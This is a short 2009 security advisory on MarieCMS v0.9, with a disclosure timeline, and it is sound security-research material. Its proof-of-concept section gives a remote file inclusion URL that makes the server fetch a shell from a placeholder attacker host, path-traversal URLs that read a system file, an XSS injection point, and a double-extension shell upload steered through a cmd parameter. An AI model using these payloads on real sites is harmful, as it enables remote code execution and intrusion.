################################################################################ Mutliple Vulnerabilities in MarieCMS v0.9 Name Multiple vulnerabilities in MarieCMS Systems Affected MarieCMS v0.9 Download http://sourceforge.net/projects/mariecms/files/MarieCMS/MarieCMS%200.9/mariecmsv0.9.zip/download Author Amol Naik (amolnaik4[at]gmail.com) Date 07/12/2009 ################################################################################ ############ OVERVIEW ############ MarieCMS v0.9 vulnerable to following issues: ++ Remote File Inclusion ++ Local File Inclusion ++ Persistent XSS ++ Shell Upload (Authenticated User) ###################### PoC ###################### # Remote File Inclusion: ++++++++++++++++++++++++ http://localhost/mariecms/?page=http://[attacker]/[site]/shell.txt? # Local File Inclusion: +++++++++++++++++++++++ http://localhost/mariecms/?mod=../../../../../../../../../../boot.ini%00 http://localhost/mariecms/admin/index.php?mod=../../../../../../../../../../../../boot.ini%00 # Persistent XSS: +++++++++++++++++ Put in "Name" field on page http://localhost/mariecms/?page=addgb&mod=gaestebuch # Shell Upload (Authenticated User): +++++++++++++++ 1. Rename shell.php to shell.jpg.php 2. Upload it into galleryupload section. 3. View images to get image id for shell.jpg.php 4. Access shell: http://[server]/[path]/_images/[image_id].php?cmd=dir ############ TimeLine ############ Bug discovered : 26/11/2009 Informed Vendor : 30/11/2009 -- No reply received from vendor till the date Public Disclosure : 02/12/2009